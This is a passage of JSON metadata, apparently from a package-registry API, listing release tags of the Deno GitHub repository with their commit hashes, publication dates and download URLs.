/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2